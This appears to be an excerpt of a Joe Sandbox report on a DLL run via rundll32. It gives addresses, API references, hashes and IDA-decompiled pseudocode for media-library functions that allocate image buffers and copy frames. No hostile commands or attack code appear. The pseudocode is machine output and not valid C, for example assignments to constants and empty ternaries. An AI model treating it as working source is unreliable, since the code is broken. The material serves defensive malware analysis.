0x1003d145
0x1003d147
0x1003d149
0x1003d173
0x1003d210
0x1003d212
0x1003d212
0x1003d215
0x1003d215
0x1003d17f
0x1003d1f8
0x1003d1fb
0x1003d1fe
0x1003d1fe
0x1003d187
0x1003d1e8
0x1003d1ea
0x1003d1ed
0x1003d1ed
0x1003d189
0x1003d18b
0x1003d18e
0x1003d191
0x1003d191
0x1003d191
0x1003d191
0x1003d14b
0x1003d14e
0x1003d150
0x1003d152
0x1003d152
0x1003d155
0x1003d156
0x1003d152
0x1003d15a
0x1003d15d
0x1003d140
0x1003d11d
0x1003d0f7
0x1003d163
0x1003d16e
0x1003d16e
0x1003d0d3
0x1003d09b
0x1003d089

APIs

mv_calloc.F086 ref: 1003D04A
mv_samples_get_buffer_size.F086 ref: 1003D07E
mv_malloc.F086 ref: 1003D092
mv_samples_fill_arrays.F086 ref: 1003D0C8

Part of subcall function 1003CCD0: mv_samples_get_buffer_size.F086 ref: 1003CD21

mv_freep.F086 ref: 1003D1B7

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_samples_get_buffer_size$mv_callocmv_freepmv_mallocmv_samples_fill_arrays
String ID:
API String ID: 3785048109-0
Opcode ID: a837376923d31b8d51785eda9ee147ded60cc4d974556988644d2961f86c7bc0
Instruction ID: c7ae188871f9336af766a03ae5236d5e5e7d21bd421fb7eeebc3b094d4729f23
Opcode Fuzzy Hash: a837376923d31b8d51785eda9ee147ded60cc4d974556988644d2961f86c7bc0
Instruction Fuzzy Hash: 1C515B75A083459FC701EF69E48060BFBE4EF95391F11492FE9888B351D3B5E945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1001B039 Relevance: 9.2, APIs: 6, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1001B039(void* __eax, void* __ebx) {
				void* _t82;

				__eflags = __eax;
				if(__eflags == 0) {
					L28:
					__edx = 0xffffffea;
				} else {
					__eax = 0;
					__esp[3] = 0;
					__eax = 0;
					__esp[2] = 0;
					__eax =  *(__ebx + 0x48);
					__esp[1] =  *(__ebx + 0x48);
					__eax =  *(__ebx + 0x44);
					 *__esp =  *(__ebx + 0x44);
					__eax = E100221C0(__ebx, __edx, __edi, __esi, __ebp, __eflags);
					__eflags = __eax;
					__edx = __eax;
					if(__eax < 0) {
						goto L1;
					}
					__eax =  *(__ebx + 0x20);
					__eflags = __eax;
					if(__eflags != 0) {
						L14:
						__esp[0xc] = __eax;
						__eax =  *(__ebx + 0x24);
						__esp[0xd] =  *(__ebx + 0x24);
						__eax =  *(__ebx + 0x28);
						__esp[0xe] =  *(__ebx + 0x28);
						__eax =  *(__ebx + 0x2c);
						__esp[0xf] =  *(__ebx + 0x2c);
						__eax =  *(__ebx + 0x48);
						__edi =  *(__ebx + 0x48) + 0x1f;
						__eax =  &(__esp[0xc]);
						__edi =  *(__ebx + 0x48) + 0x0000001f & 0xffffffe0;
						__esp[3] =  &(__esp[0xc]);
						__esp[2] = __edi;
						__eax =  *(__ebx + 0x50);
						__esp[1] =  *(__ebx + 0x50);
						__eax =  &(__esp[0x10]);
						 *__esp =  &(__esp[0x10]);
						__eax = L100219B0(__ebx, __edi, __esi, __ebp, __eflags);
						__eflags = __eax;
						__edx = __eax;
						if(__eax < 0) {
							goto L1;
						}
						__eax = 0x20;
						__ecx = __esp[0x10];
						__edx = 0x7fffffff;
						__eflags = __esp[0x1d] - 0x20;
						__ebp = 0x7fffffff;
						__eax =  >=  ? __esp[0x1d] : 0x20;
						__esi = 0x20;
						__eax = ( >=  ? __esp[0x1d] : 0x20) * 4;
						__ebp = 0x7fffffdf;
						__eflags = 0x7fffffdf - __ecx;
						if(0x7fffffdf < __ecx) {
							goto L28;
						}
						__ecx = __ecx + __eax;
						__eax = __esp[0x11];
						0x7fffffff = 0x7fffffff - __ecx;
						__eflags = 0x7fffffff - __ecx - __eax;
						if(0x7fffffff - __ecx < __eax) {
							goto L28;
						}
						__eax = __eax + __ecx;
						__ecx = __esp[0x12];
						__ebp = 0x7fffffff;
						__ebp = 0x7fffffff - __eax;
						__eflags = 0x7fffffff - __ecx;
						if(0x7fffffff < __ecx) {
							goto L28;
						}
						__eax = __eax + __ecx;
						__ecx = __esp[0x13];
						__edx = 0x7fffffff - __eax;
						__eflags = 0x7fffffff - __eax - __ecx;
						if(0x7fffffff - __eax < __ecx) {
							goto L28;
						}
						__eax = L10009DC0(__ebx, __ecx, __edi, 0x20, __ecx);
						 *(__ebx + 0xb8) = __eax;
						__eflags = __eax;
						if(__eflags == 0) {
							__edx = 0xfffffff4;
							L30:
							__esp[0xb] = __edx;
							__ebx = E1001A460(__ebx);
							__edx = __esp[0xb];
							goto L1;
						}
						__edx = __ebx + 0x20;
						__esp[4] = __ebx + 0x20;
						__eax =  *(__eax + 4);
						__esp[2] = __edi;
						__esp[3] = __eax;
						__eax =  *(__ebx + 0x50);
						 *__esp = __ebx;
						__esp[1] =  *(__ebx + 0x50);
						__eax = L10021AF0(__ebx, __edi, __esi, __ebp, __eflags);
						__eflags = __eax;
						__edx = __eax;
						if(__eax < 0) {
							goto L30;
						}
						__eax =  *(__ebx + 4);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = __eax + __esi;
							__eflags = __eax;
							 *(__ebx + 4) = __eax;
						}
						__eax =  *(__ebx + 8);
						__eflags = __eax;
						if(__eax != 0) {
							 *(__ebx + 8) = __eax;
						}
						__eax =  *(__ebx + 0xc);
						__eflags = __eax;
						if(__eax != 0) {
							__edx = __esi + __esi * 2;
							__eax = __eax + __esi + __esi * 2;
							__eflags = __eax;
							 *(__ebx + 0xc) = __eax;
						}
						 *(__ebx + 0x40) = __ebx;
						__edx = 0;
					} else {
						__eax = __esp[0x1d];
						__esi = 0x20;
						__ebp = 1;
						__edi = __ebx + 0x20;
						__eflags = __esp[0x1d];
						__esi =  >  ? __esp[0x1d] : 0x20;
						__eax = 0x1f;
						__esp[0xb] = 0x1f;
						while(1) {
							__eax =  *(__ebx + 0x44);
							__ebp =  ~__ebp;
							 *(__ebx + 0x44) + __ebp =  *(__ebx + 0x44) + __ebp - 1;
							__eax =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
							__esp[2] =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
							__eax =  *(__ebx + 0x50);
							 *__esp = __edi;
							__esp[1] =  *(__ebx + 0x50);
							__eax = E100215D0(__eflags);
							__eflags = __eax;
							__edx = __eax;
							if(__eax < 0) {
								goto L1;
							}
							__eax =  *(__ebx + 0x20);
							__eflags = __esp[0xb] & __eax;
							if((__esp[0xb] & __eax) != 0) {
								__ebp = __ebp + __ebp;
								__eflags = __ebp - __esi;
								if(__eflags > 0) {
									L10:
									__ecx =  *(__ebx + 0x24);
									__eax = __esi + __eax - 1;
									__edx = __esi;
									__edx =  ~__esi;
									__eax = __eax & __edx;
									 *(__ebx + 0x20) = __eax;
									__eflags = __ecx;
									if(__eflags != 0) {
										__ecx = __esi + __ecx - 1;
										 *(__ebx + 0x24) = __ecx;
										__ecx =  *(__ebx + 0x28);
										__eflags = __ecx;
										if(__eflags != 0) {
											__ecx = __esi + __ecx - 1;
											 *(__ebx + 0x28) = __ecx;
											__ecx =  *(__ebx + 0x2c);
											__eflags = __ecx;
											if(__eflags != 0) {
												__edx = __edx & __ecx;
												__eflags = __edx;
												 *(__ebx + 0x2c) = __edx;
											}
										}
									}
									goto L14;
								}
								continue;
							}
							__eflags = __eax;
							if(__eflags == 0) {
								goto L14;
							}
							goto L10;
						}
					}
				}
				L1:
				return _t82;
			}

0x1001b048
0x1001b04a
0x1001b23d
0x1001b23d
0x1001b050
0x1001b050
0x1001b052
0x1001b056
0x1001b058
0x1001b05c
0x1001b05f
0x1001b063
0x1001b066
0x1001b069
0x1001b06e
0x1001b070
0x1001b072
0x00000000
0x00000000
0x1001b078
0x1001b07b
0x1001b07d
0x1001b121
0x1001b121
0x1001b125
0x1001b128
0x1001b12c
0x1001b12f
0x1001b133
0x1001b136
0x1001b13a
0x1001b13d
0x1001b140
0x1001b144
0x1001b147
0x1001b14b
0x1001b14f
0x1001b152
0x1001b156
0x1001b15a
0x1001b15d
0x1001b162
0x1001b164
0x1001b166
0x00000000
0x00000000
0x1001b16c
0x1001b171
0x1001b175
0x1001b17a
0x1001b17e
0x1001b180
0x1001b185
0x1001b187
0x1001b18e
0x1001b190
0x1001b192
0x00000000
0x00000000
0x1001b198
0x1001b19a
0x1001b1a0
0x1001b1a2
0x1001b1a4
0x00000000
0x00000000
0x1001b1aa
0x1001b1ac
0x1001b1b0
0x1001b1b2
0x1001b1b4
0x1001b1b6
0x00000000
0x00000000
0x1001b1bc
0x1001b1be
0x1001b1c2
0x1001b1c4
0x1001b1c6
0x00000000
0x00000000
0x1001b1cd
0x1001b1d2
0x1001b1d8
0x1001b1da
0x1001b2c7
0x1001b2cc
0x1001b2cc
0x1001b2d2
0x1001b2d7
0x00000000
0x1001b2d7
0x1001b1e0
0x1001b1e3
0x1001b1e7
0x1001b1ea
0x1001b1ee
0x1001b1f2
0x1001b1f5
0x1001b1f8
0x1001b1fc
0x1001b201
0x1001b203
0x1001b205
0x00000000
0x00000000
0x1001b20b
0x1001b20e
0x1001b210
0x1001b212
0x1001b212
0x1001b214
0x1001b214
0x1001b217
0x1001b21a
0x1001b21c
0x1001b221
0x1001b221
0x1001b224
0x1001b227
0x1001b229
0x1001b22b
0x1001b22e
0x1001b22e
0x1001b230
0x1001b230
0x1001b233
0x1001b236
0x1001b083
0x1001b083
0x1001b087
0x1001b08c
0x1001b091
0x1001b094
0x1001b096
0x1001b09b
0x1001b09e
0x1001b0ae
0x1001b0ae
0x1001b0b3
0x1001b0b7
0x1001b0b8
0x1001b0ba
0x1001b0be
0x1001b0c1
0x1001b0c4
0x1001b0c8
0x1001b0cd
0x1001b0cf
0x1001b0d1
0x00000000
0x00000000
0x1001b0d7
0x1001b0da
0x1001b0de
0x1001b0a8
0x1001b0aa
0x1001b0ac
0x1001b0e4
0x1001b0e4
0x1001b0e7
0x1001b0eb
0x1001b0ed
0x1001b0ef
0x1001b0f1
0x1001b0f4
0x1001b0f6
0x1001b0f8
0x1001b0fe
0x1001b101
0x1001b104
0x1001b106
0x1001b108
0x1001b10e
0x1001b111
0x1001b114
0x1001b116
0x1001b11c
0x1001b11c
0x1001b11e
0x1001b11e
0x1001b116
0x1001b106
0x00000000
0x1001b0f6
0x00000000
0x1001b0ac
0x1001b0e0
0x1001b0e2
0x00000000
0x00000000
0x00000000
0x1001b0e2
0x1001b0ae
0x1001b07d
0x1001af07
0x1001af10

APIs

mv_pix_fmt_desc_get.F086 ref: 1001B043
mv_image_check_size.F086 ref: 1001B069

Part of subcall function 100221C0: mv_image_get_linesize.F086 ref: 10022203

mv_image_fill_linesizes.F086 ref: 1001B0C8

Part of subcall function 100215D0: mv_pix_fmt_desc_get.F086(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 100215E6

mv_image_fill_plane_sizes.F086 ref: 1001B15D
mv_buffer_alloc.F086 ref: 1001B1CD
mv_image_fill_pointers.F086 ref: 1001B1FC

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_pix_fmt_desc_get$mv_buffer_allocmv_image_check_sizemv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_fill_pointersmv_image_get_linesize
String ID:
API String ID: 566543421-0
Opcode ID: 8bdd919ebcf96b38ab9bf70343630153b1bf13f81f3e3c8d122ca7593c126649
Instruction ID: 4992ce4e1065cc46e00ece35f003ee7f574db56b11f2f258b44564899a0fbe5b
Opcode Fuzzy Hash: 8bdd919ebcf96b38ab9bf70343630153b1bf13f81f3e3c8d122ca7593c126649
Instruction Fuzzy Hash: 4561E7B5A08B018FCB44DF69D59065ABBE1FF88240F16897DE949CB315E735E844CF41

Uniqueness

Uniqueness Score: -1.00%

Function 1001C210 Relevance: 9.1, APIs: 6, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E1001C210(signed char _a4) {
				char _v60;
				intOrPtr _v100;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				char _v388;
				intOrPtr _v404;
				signed char _v408;
				intOrPtr _t49;
				signed int _t50;
				void* _t59;
				intOrPtr _t63;
				void* _t67;
				void* _t69;
				void* _t72;
				signed int _t76;
				signed char _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed char _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				void* _t98;
				intOrPtr* _t99;

				_t99 = _t98 - 0x18c;
				_t93 = _a4;
				_t49 =  *((intOrPtr*)(_t93 + 0xb8));
				if(_t49 == 0) {
					L10:
					_t82 =  &_v388;
					_t50 = 0;
					do {
						 *((intOrPtr*)(_t82 + _t50)) = 0;
						 *((intOrPtr*)(_t82 + _t50 + 4)) = 0;
						_t50 = _t50 + 8;
					} while (_t50 < 0x168);
					_v308 =  *((intOrPtr*)(_t93 + 0x50));
					_v208 =  *((intOrPtr*)(_t93 + 0xb4));
					_v320 =  *((intOrPtr*)(_t93 + 0x44));
					_v316 =  *((intOrPtr*)(_t93 + 0x48));
					_v100 =  *((intOrPtr*)(_t93 + 0x120));
					_v212 =  *((intOrPtr*)(_t93 + 0xb0));
					_v312 =  *((intOrPtr*)(_t93 + 0x4c));
					_v408 = _t93 + 0x148;
					 *_t99 =  &_v60;
					_t59 = E1000D340();
					_t94 = _t59;
					if(_t59 < 0) {
						L24:
						E1001A460(_t82);
						return _t94;
					} else {
						_t63 =  *((intOrPtr*)(_t93 + 0x128));
						if(_t63 == 0) {
							 *_t99 = _t82;
							_v408 = 0;
							_t95 = L1001ADF0();
						} else {
							_v408 = _t82;
							_v404 = 0;
							 *_t99 = _t63;
							_t95 = E1001E690();
						}
						if(_t95 < 0) {
							goto L23;
						} else {
							_v408 = _t93;
							 *_t99 = _t82;
							_t67 = L1001B8D0();
							_t118 = _t67;
							_t94 = _t67;
							if(_t67 < 0) {
								goto L24;
							} else {
								_t69 = L1001A6C0(_t82, 1, _t93, _t118);
								_t94 = _t69;
								if(_t69 < 0) {
									goto L24;
								} else {
									E1001A460(_t93);
									_t72 = 0;
									do {
										 *((intOrPtr*)(_t93 + _t72)) =  *((intOrPtr*)(_t99 + _t72 + 0x18));
										 *((intOrPtr*)(_t93 + _t72 + 4)) =  *((intOrPtr*)(_t99 + _t72 + 0x1c));
										_t72 = _t72 + 8;
									} while (_t72 < 0x168);
									if(_v324 == _t82) {
										 *((intOrPtr*)(_t93 + 0x40)) = _t93;
									}
									goto L22;
								}
							}
						}
					}
				} else {
					_t83 = _t93 + 0xbc;
					_t96 = 1;
					_t97 = _t93 + 0xd8;
					L3:
					L3:
					if(_t49 != 0) {
						 *_t99 = _t49;
						_t96 = _t96 & (E1000A070() & 0xffffff00 | _t79 != 0x00000000) & 0x000000ff;
					}
					if(_t83 != _t97) {
						goto L2;
					}
					if( *((intOrPtr*)(_t93 + 0xdc)) > 0) {
						_t84 = 0;
						do {
							 *_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0xd8)) + _t84 * 4));
							_t76 = E1000A070();
							_t84 = _t84 + 1;
							_t96 = _t96 & (_t76 & 0xffffff00 | _t76 != 0x00000000) & 0x000000ff;
						} while (_t84 <  *((intOrPtr*)(_t93 + 0xdc)));
					}
					if(_t96 != 0) {
						L22:
						_t95 = 0;
						L23:
						return _t95;
					} else {
						goto L10;
					}
					goto L26;
					L2:
					_t49 =  *_t83;
					_t83 = _t83 + 4;
					__eflags = _t83;
					goto L3;
				}
				L26:
			}

0x1001c214
0x1001c21a
0x1001c221
0x1001c229
0x1001c29c
0x1001c29c
0x1001c2a2
0x1001c2a4
0x1001c2a4
0x1001c2a7
0x1001c2ab
0x1001c2ae
0x1001c2be
0x1001c2c5
0x1001c2cc
0x1001c2d3
0x1001c2dd
0x1001c2ea
0x1001c2f4
0x1001c2fe
0x1001c309
0x1001c30c
0x1001c313
0x1001c315
0x1001c3b0
0x1001c3b2
0x1001c3c3
0x1001c31b
0x1001c31b
0x1001c323
0x1001c3c8
0x1001c3cd
0x1001c3d6
0x1001c329
0x1001c329
0x1001c32f
0x1001c333
0x1001c33b
0x1001c33b
0x1001c33f
0x00000000
0x1001c341
0x1001c341
0x1001c345
0x1001c348
0x1001c34d
0x1001c34f
0x1001c351
0x00000000
0x1001c353
0x1001c35c
0x1001c363
0x1001c365
0x00000000
0x1001c367
0x1001c369
0x1001c36e
0x1001c370
0x1001c378
0x1001c37b
0x1001c37f
0x1001c382
0x1001c38d
0x1001c38f
0x1001c38f
0x00000000
0x1001c38d
0x1001c365
0x1001c351
0x1001c33f
0x1001c22b
0x1001c22b
0x1001c231
0x1001c236
0x00000000
0x1001c245
0x1001c247
0x1001c249
0x1001c259
0x1001c259
0x1001c25d
0x00000000
0x00000000
0x1001c267
0x1001c269
0x1001c270
0x1001c279
0x1001c27c
0x1001c286
0x1001c28a
0x1001c28c
0x1001c270
0x1001c296
0x1001c3a0
0x1001c3a0
0x1001c3a2
0x1001c3ae
0x00000000
0x00000000
0x00000000
0x00000000
0x1001c240
0x1001c240
0x1001c242
0x1001c242
0x00000000
0x1001c242
0x00000000

APIs

mv_buffer_is_writable.F086 ref: 1001C24C
mv_buffer_is_writable.F086 ref: 1001C27C
mv_channel_layout_copy.F086 ref: 1001C30C
mv_hwframe_get_buffer.F086 ref: 1001C336
mv_frame_copy.F086 ref: 1001C348

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_is_writable$mv_channel_layout_copymv_frame_copymv_hwframe_get_buffer
String ID:
API String ID: 1431812533-0
Opcode ID: f51d21cc51dcd08a1813b896c01dc70d91b05fa0b1bcabd5a0f2eceed2e49e57
Instruction ID: 9aa00ebb7c7a901d7ff1af15f7d5cd17a7e62451d1a9c752bdbd2b923dfe8871
Opcode Fuzzy Hash: f51d21cc51dcd08a1813b896c01dc70d91b05fa0b1bcabd5a0f2eceed2e49e57
Instruction Fuzzy Hash: F0514A75A047169FD354CF79C880B9AF7E4FF88350F018A2AE999CB301E734E9948B91

Uniqueness

Uniqueness Score: -1.00%

Function 10001020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,10001281,?,?,?,?,?,?,100013AE), ref: 10001057
_amsg_exit.MSVCRT ref: 10001086

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 32c44298f69c23ec634c9dcdada737d11102db2f3ca822c9fd713eb8b7c401c5
Instruction ID: 2785d9bf782298c98c7f05eb770d18c25c91c74859540191a5f4291f5604d36f
Opcode Fuzzy Hash: 32c44298f69c23ec634c9dcdada737d11102db2f3ca822c9fd713eb8b7c401c5
Instruction Fuzzy Hash: D031DE70609291CBF341DF69C9C838A77E0EB843D4F11842DED888B65CD7B9D980CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1000E173 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 1000DF70
mv_channel_layout_from_mask.F086 ref: 1000E046
mv_freep.F086 ref: 1000E17B

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_channel_layout_from_maskmv_freepstrcmp
String ID:
API String ID: 3576703362-0
Opcode ID: 820ae5dd8703ee1a0e668245ce805bc40d27f1a58968503d90ea3e7159de7ad7
Instruction ID: f14a3d27c2c21489c07e4dbc689c5fec37a1484687acd34e25a8149a501b133e
Opcode Fuzzy Hash: 820ae5dd8703ee1a0e668245ce805bc40d27f1a58968503d90ea3e7159de7ad7
Instruction Fuzzy Hash: 45312535A083819FE340EF25D48062FBBE1EF84394F52992EF98997314D671EC40CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10033008 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 276COMMON

Download Yara Rule

APIs

mv_strstart.F086 ref: 100327D5
mv_strstart.F086 ref: 100327FE

Strings

, xrefs: 10032B32
xyz, xrefs: 100327F5
yuvj, xrefs: 100327C4

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_strstart
String ID: $xyz$yuvj
API String ID: 2201124280-2071466796
Opcode ID: 39b5a30e90ac46c83331b72173aec11757fe19d2f3b47d718497b41df0643e4c
Instruction ID: a5d947d74d650894119c99c5be97153cec975f5daebd80d8028626f77209e2c2
Opcode Fuzzy Hash: 39b5a30e90ac46c83331b72173aec11757fe19d2f3b47d718497b41df0643e4c
Instruction Fuzzy Hash: 72C1BD355083958FD342CF29C8D079ABBE2EB86385F48496CE4D58B366D274EA58CB42

Uniqueness

Uniqueness Score: -1.00%

Function 10022061 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

mv_image_get_linesize.F086 ref: 100220C7

Part of subcall function 10021480: mv_pix_fmt_desc_get.F086(?,?,?,?,?,?,?,?,?,?,00000000,?,100B6C20,00000000,10022208), ref: 10021496

mv_log.F086 ref: 10022171
mv_log.F086(?), ref: 100221AE

Strings

Picture size %ux%u exceeds specified max pixel count %lld, see the documentation if you wish to increase it, xrefs: 1002219E
Picture size %ux%u is invalid, xrefs: 10022154

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log$mv_image_get_linesizemv_pix_fmt_desc_get
String ID: Picture size %ux%u exceeds specified max pixel count %lld, see the documentation if you wish to increase it$Picture size %ux%u is invalid
API String ID: 1737039923-91635712
Opcode ID: 54d24d788e18d8ea4c466eabd4131f5e9fbc720227a3fc9df816d3be53757df9
Instruction ID: d1011bfbbf7dbf5d13950a67888087e963138b3faade39ec3db9adc7e097331a
Opcode Fuzzy Hash: 54d24d788e18d8ea4c466eabd4131f5e9fbc720227a3fc9df816d3be53757df9
Instruction Fuzzy Hash: 9441D0B5A083549FC340CF69C48060AFBE1FBD8750F958A2EF9A8D3350E774E9458B82

Uniqueness

Uniqueness Score: -1.00%

Function 1000C560 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 1000C582
strcmp.MSVCRT ref: 1000C5B0
strtol.MSVCRT ref: 1000C5DA

Strings

AMBI, xrefs: 1000C561

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
